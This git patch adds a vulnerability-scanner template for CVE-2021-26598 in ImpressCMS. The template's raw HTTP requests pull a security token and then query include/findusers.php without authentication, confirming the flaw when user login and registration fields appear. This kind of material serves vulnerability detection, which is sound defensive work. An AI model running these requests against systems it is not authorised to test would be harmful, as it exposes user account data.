From 1e374c7482edb37decc985f5d7d4d378bada08fa Mon Sep 17 00:00:00 2001 From: GwanYeong Kim Date: Sun, 3 Apr 2022 11:23:45 +0900 Subject: [PATCH] Create CVE-2021-26598.yaml ImpressCMS before 1.4.3 has Incorrect Access Control because include/findusers.php allows access by unauthenticated attackers (who are, by design, able to have a security token). Signed-off-by: GwanYeong Kim --- cves/2021/CVE-2021-26598.yaml | 48 +++++++++++++++++++++++++++++++++++ 1 file changed, 48 insertions(+) create mode 100644 cves/2021/CVE-2021-26598.yaml diff --git a/cves/2021/CVE-2021-26598.yaml b/cves/2021/CVE-2021-26598.yaml new file mode 100644 index 0000000000..90de151606 --- /dev/null +++ b/cves/2021/CVE-2021-26598.yaml @@ -0,0 +1,48 @@ +id: CVE-2021-26598 + +info: + name: ImpressCMS - Incorrect Authorization + author: gy741,pdteam + severity: medium + description: ImpressCMS before 1.4.3 has Incorrect Access Control because include/findusers.php allows access by unauthenticated attackers (who are, by design, able to have a security token). + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2021-26598 + - http://karmainsecurity.com/KIS-2022-03 + - https://hackerone.com/reports/1081137 + tags: cve,cve2021,impresscms + +requests: + - raw: + - | + GET /misc.php?action=showpopups&type=friend HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36 + + - | + GET /include/findusers.php?token={{token}} HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36 + + cookie-reuse: true + req-condition: true + matchers-condition: and + matchers: + - type: word + part: body_2 + words: + - 'last_login' + - 'user_regdate' + condition: and + + - type: status + status: + - 200 + + extractors: + - type: regex + name: token + internal: true + group: 1 + regex: + - "REQUEST' value='(.*?)'" + - 'REQUEST" value="(.*?)"'